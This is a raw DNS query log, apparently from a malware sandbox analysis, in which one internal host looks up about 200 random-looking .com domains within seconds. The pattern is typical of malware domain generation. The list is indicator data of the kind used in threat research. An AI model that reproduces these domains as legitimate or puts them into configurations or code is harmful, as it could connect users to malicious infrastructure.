                                                                                                                                                                                                          Nov 11, 2024 18:24:49.382586956 CET192.168.2.81.1.1.10x12bfStandard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.382960081 CET192.168.2.81.1.1.10xad9bStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.383027077 CET192.168.2.81.1.1.10xa07dStandard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.383533001 CET192.168.2.81.1.1.10x2c56Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.383725882 CET192.168.2.81.1.1.10xc3cfStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.383991957 CET192.168.2.81.1.1.10x3d5Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.384223938 CET192.168.2.81.1.1.10x4e48Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.384448051 CET192.168.2.81.1.1.10xae4cStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.384676933 CET192.168.2.81.1.1.10xf3aaStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.384898901 CET192.168.2.81.1.1.10x85d5Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.385133028 CET192.168.2.81.1.1.10xb6ebStandard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.385335922 CET192.168.2.81.1.1.10x1d14Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.388619900 CET192.168.2.81.1.1.10xebf6Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.391062021 CET192.168.2.81.1.1.10xfe15Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.395750046 CET192.168.2.81.1.1.10xf7deStandard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.406853914 CET192.168.2.81.1.1.10xd22cStandard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.413602114 CET192.168.2.81.1.1.10x9c27Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.414953947 CET192.168.2.81.1.1.10x17daStandard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.622014046 CET192.168.2.81.1.1.10x80e9Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.622440100 CET192.168.2.81.1.1.10x99d2Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.622440100 CET192.168.2.81.1.1.10x24c4Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.622855902 CET192.168.2.81.1.1.10x1bdfStandard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.622925997 CET192.168.2.81.1.1.10x52a3Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.623167992 CET192.168.2.81.1.1.10x53f4Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.623569012 CET192.168.2.81.1.1.10x7d8aStandard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.624264956 CET192.168.2.81.1.1.10xccabStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.624409914 CET192.168.2.81.1.1.10xd58aStandard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.665004969 CET192.168.2.81.1.1.10xe0f8Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.665987968 CET192.168.2.81.1.1.10x4fe9Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.666389942 CET192.168.2.81.1.1.10x8019Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.666747093 CET192.168.2.81.1.1.10x82a9Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667212009 CET192.168.2.81.1.1.10x92b9Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667500973 CET192.168.2.81.1.1.10xb2daStandard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667522907 CET192.168.2.81.1.1.10x633eStandard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667819023 CET192.168.2.81.1.1.10x2dccStandard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.667840958 CET192.168.2.81.1.1.10x32fbStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668106079 CET192.168.2.81.1.1.10xd3a0Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668301105 CET192.168.2.81.1.1.10x56fcStandard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668567896 CET192.168.2.81.1.1.10x3135Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.668776035 CET192.168.2.81.1.1.10x818fStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.674132109 CET192.168.2.81.1.1.10x2c1cStandard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.674256086 CET192.168.2.81.1.1.10x3b02Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.674412012 CET192.168.2.81.1.1.10xb5e4Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.689441919 CET192.168.2.81.1.1.10x80fdStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.690323114 CET192.168.2.81.1.1.10x22e3Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.690872908 CET192.168.2.81.1.1.10x97b9Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.692517996 CET192.168.2.81.1.1.10x9dfaStandard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.694489002 CET192.168.2.81.1.1.10x98aStandard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.699156046 CET192.168.2.81.1.1.10x7373Standard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.699666023 CET192.168.2.81.1.1.10x2ebcStandard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.700689077 CET192.168.2.81.1.1.10xe5c9Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.700975895 CET192.168.2.81.1.1.10xb170Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:49.702193975 CET192.168.2.81.1.1.10xb6d3Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.485253096 CET192.168.2.81.1.1.10x93f3Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.488550901 CET192.168.2.81.1.1.10x551aStandard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.489425898 CET192.168.2.81.1.1.10x7697Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.492350101 CET192.168.2.81.1.1.10x45deStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.494491100 CET192.168.2.81.1.1.10x44eStandard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.548059940 CET192.168.2.81.1.1.10x3fa2Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.548352957 CET192.168.2.81.1.1.10xd1d4Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.568631887 CET192.168.2.81.1.1.10xd123Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.606359959 CET192.168.2.81.1.1.10xa437Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.607108116 CET192.168.2.81.1.1.10xb91aStandard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.607790947 CET192.168.2.81.1.1.10xaf5fStandard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.631758928 CET192.168.2.81.1.1.10xcf38Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.651937008 CET192.168.2.81.1.1.10x56a3Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.653882027 CET192.168.2.81.1.1.10x4d05Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.669162989 CET192.168.2.81.1.1.10x4119Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.677472115 CET192.168.2.81.1.1.10xfeabStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.685214043 CET192.168.2.81.1.1.10xc8a1Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.686012030 CET192.168.2.81.1.1.10x3f4aStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.687937021 CET192.168.2.81.1.1.10x93b2Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.690628052 CET192.168.2.81.1.1.10xad59Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.692930937 CET192.168.2.81.1.1.10xda57Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.694031000 CET192.168.2.81.1.1.10xd4afStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.694467068 CET192.168.2.81.1.1.10x777cStandard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.703680038 CET192.168.2.81.1.1.10x1d15Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.705689907 CET192.168.2.81.1.1.10x88c2Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.707376957 CET192.168.2.81.1.1.10x6ebcStandard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.707658052 CET192.168.2.81.1.1.10x873eStandard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.708327055 CET192.168.2.81.1.1.10x414cStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.708528042 CET192.168.2.81.1.1.10xa627Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.722110033 CET192.168.2.81.1.1.10xfa30Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.723365068 CET192.168.2.81.1.1.10xbfc2Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.723419905 CET192.168.2.81.1.1.10x47f8Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.723612070 CET192.168.2.81.1.1.10xc74Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.723875046 CET192.168.2.81.1.1.10xe223Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.726418972 CET192.168.2.81.1.1.10x7c99Standard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.726599932 CET192.168.2.81.1.1.10x142bStandard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.726866007 CET192.168.2.81.1.1.10x80ceStandard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.727533102 CET192.168.2.81.1.1.10xc88bStandard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.727689981 CET192.168.2.81.1.1.10x5dc2Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.727849007 CET192.168.2.81.1.1.10x114aStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.728024006 CET192.168.2.81.1.1.10xd8c8Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.738317966 CET192.168.2.81.1.1.10xe09cStandard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.738578081 CET192.168.2.81.1.1.10x909fStandard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739268064 CET192.168.2.81.1.1.10x2b51Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739418983 CET192.168.2.81.1.1.10x11a0Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739561081 CET192.168.2.81.1.1.10xfdf2Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739837885 CET192.168.2.81.1.1.10xa365Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.739837885 CET192.168.2.81.1.1.10x4b73Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740176916 CET192.168.2.81.1.1.10xb791Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740241051 CET192.168.2.81.1.1.10x3fc2Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740369081 CET192.168.2.81.1.1.10xbdfStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740494967 CET192.168.2.81.1.1.10xd6f8Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740686893 CET192.168.2.81.1.1.10x6906Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740704060 CET192.168.2.81.1.1.10x6f97Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.740888119 CET192.168.2.81.1.1.10x3befStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.741049051 CET192.168.2.81.1.1.10x2fb0Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.741188049 CET192.168.2.81.1.1.10xcedeStandard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.741337061 CET192.168.2.81.1.1.10xda1fStandard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745699883 CET192.168.2.81.1.1.10x1382Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745744944 CET192.168.2.81.1.1.10xc60Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745906115 CET192.168.2.81.1.1.10x2519Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.745943069 CET192.168.2.81.1.1.10xc3deStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:52.747354031 CET192.168.2.81.1.1.10x641fStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.329818964 CET192.168.2.81.1.1.10x50a4Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.335997105 CET192.168.2.81.1.1.10x1858Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.336407900 CET192.168.2.81.1.1.10x886bStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.340081930 CET192.168.2.81.1.1.10x4995Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.341064930 CET192.168.2.81.1.1.10xd0f6Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.356642008 CET192.168.2.81.1.1.10x77feStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.362806082 CET192.168.2.81.1.1.10xcde1Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.362951994 CET192.168.2.81.1.1.10x10e7Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.370963097 CET192.168.2.81.1.1.10x1936Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.427406073 CET192.168.2.81.1.1.10xcbe6Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.427648067 CET192.168.2.81.1.1.10x76d1Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.427839041 CET192.168.2.81.1.1.10x74e1Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.428070068 CET192.168.2.81.1.1.10x78f1Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.451994896 CET192.168.2.81.1.1.10xb0d9Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.484781981 CET192.168.2.81.1.1.10x33d4Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.485193968 CET192.168.2.81.1.1.10x2cadStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.485383987 CET192.168.2.81.1.1.10x9e87Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.497920990 CET192.168.2.81.1.1.10x24c9Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.498975992 CET192.168.2.81.1.1.10xaba9Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536467075 CET192.168.2.81.1.1.10x39aStandard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536693096 CET192.168.2.81.1.1.10x2421Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536851883 CET192.168.2.81.1.1.10x77d1Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536999941 CET192.168.2.81.1.1.10xa99cStandard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537161112 CET192.168.2.81.1.1.10x982bStandard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537328005 CET192.168.2.81.1.1.10x2f0fStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537472963 CET192.168.2.81.1.1.10x631bStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537607908 CET192.168.2.81.1.1.10xb24dStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537755013 CET192.168.2.81.1.1.10x442bStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537899971 CET192.168.2.81.1.1.10x94caStandard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538039923 CET192.168.2.81.1.1.10x1441Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538193941 CET192.168.2.81.1.1.10x5dd7Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538330078 CET192.168.2.81.1.1.10x18e8Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538486958 CET192.168.2.81.1.1.10x467bStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538641930 CET192.168.2.81.1.1.10x735cStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538992882 CET192.168.2.81.1.1.10xc0b6Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540559053 CET192.168.2.81.1.1.10x5accStandard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540736914 CET192.168.2.81.1.1.10x5b1Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540904045 CET192.168.2.81.1.1.10x815Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541053057 CET192.168.2.81.1.1.10xbebcStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541201115 CET192.168.2.81.1.1.10xa2d3Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541354895 CET192.168.2.81.1.1.10xf324Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541517019 CET192.168.2.81.1.1.10x7968Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541660070 CET192.168.2.81.1.1.10x2676Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541820049 CET192.168.2.81.1.1.10x7e2cStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541960001 CET192.168.2.81.1.1.10x1178Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542171001 CET192.168.2.81.1.1.10xd6d6Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542617083 CET192.168.2.81.1.1.10x9cf3Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542778015 CET192.168.2.81.1.1.10xbbb6Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542956114 CET192.168.2.81.1.1.10x16c8Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554208040 CET192.168.2.81.1.1.10x91ceStandard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554718018 CET192.168.2.81.1.1.10xfc01Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.557899952 CET192.168.2.81.1.1.10xce52Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558074951 CET192.168.2.81.1.1.10xbbd3Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558227062 CET192.168.2.81.1.1.10x967eStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558374882 CET192.168.2.81.1.1.10x50daStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558856964 CET192.168.2.81.1.1.10x937eStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.618438005 CET192.168.2.81.1.1.10xf883Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621239901 CET192.168.2.81.1.1.10xa1e2Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621493101 CET192.168.2.81.1.1.10xdbd0Standard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.630203009 CET192.168.2.81.1.1.10x2e70Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.631808043 CET192.168.2.81.1.1.10xdc4eStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632425070 CET192.168.2.81.1.1.10xdfbfStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632611990 CET192.168.2.81.1.1.10xbc3dStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.633476019 CET192.168.2.81.1.1.10xa05cStandard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.323288918 CET192.168.2.81.1.1.10x268Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.386430025 CET192.168.2.81.1.1.10xa83dStandard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.387187958 CET192.168.2.81.1.1.10x6c8eStandard query (0)vofycim.comA (IP address)IN (0x0001)false
